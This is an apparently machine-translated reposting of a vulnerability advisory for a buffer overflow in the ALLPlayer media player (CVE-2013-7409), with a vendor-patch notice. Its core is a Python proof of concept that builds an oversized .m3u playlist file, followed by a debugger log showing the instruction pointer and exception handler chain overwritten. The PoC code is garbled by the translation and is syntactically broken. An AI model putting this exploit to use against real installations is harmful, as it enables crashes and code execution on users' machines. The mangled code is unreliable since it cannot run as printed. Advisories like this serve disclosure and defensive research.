ALLPlayer 5.6.2 Local Buffer Overflow Vulnerability

Source: Internet
Author: User

ALLPlayer 5.6.2 Local Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
ALLPlayer 5.6.2-5.8.1
Description:
CVE (CAN) ID: CVE-2013-7409

ALLPlayer is a media player software.

ALLPlayer 5.6.2-5.8.1 has a buffer overflow vulnerability. Remote attackers can exploit this vulnerability to cause denial of service and arbitrary code execution through long strings in the. m3u file.

<* Source: metacom
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Metacom () provides the following test methods:

Title: ALLPlayer Local Buffer Overflow PoC UNICODE
Vendor: http://www.allplayer.org/download/allplayer
Date found: 09.10.2013
Date published: 09.10.2013
Platform: windows 7 German
Bug: Buffer Overflow UNICODE
----------------------------

1) VERSIONS AFFECTED
----
ALLPlayer 5.6.2

2) Proof of Concept
------------------

Junk = "http ://"

Buffer = "* x41" * 5000

Exploit = junk + buffer

Try:
Out_file = open ("ALLPlayer_Poc.m3u", 'w ')
Out_file.write (exploit)
Out_file.close ()
Print "Exploit file created! "
Except t:
Print "Error"

3)-(DEBUG)
----------
(1e60. 1dec): Access violation-code c0000005 (!!! Second chance !!!)
* ** WARNING: Unable to verify checksum for C: \ Program Files \ ALLPlayer \ ALLPlayer.exe
* ** ERROR: Module load completed but symbols cocould not be loaded for C: \ Program Files \ ALLPlayer \ ALLPlayer.exe
Eax = 00000000 ebx = 00000000 ecx = 00410041 edx = 770d720d esi = 00000000 edi = 00000000
Eip = 00410041 esp = 000311c4 ebp = 000311e4 iopl = 0 nv up ei pl zr na pe nc
Cs = 001b ss = 0023 ds = 0023 es = 0023 fs = 003b gs = 0000 efl = 00210246
ALLPlayer + 0x10041:
00410041 008bc0ff2504 add byte ptr [ebx + effecffc0h], cl ds: 0023: 0366ffc0 = ??
0: 000>! Exchain
---------------
0012e4b0: ALLPlayer + 1b7037 (005b7037)
0012e734: ALLPlayer + 10041 (00410041)
Invalid exception stacks at 00410041

4) Credits
---------
Metacom
Contact: metacom27 at gmail.com

Suggestion:
Vendor patch:

ALLPlayer
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.allplayer.org/

This article permanently updates the link address:

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.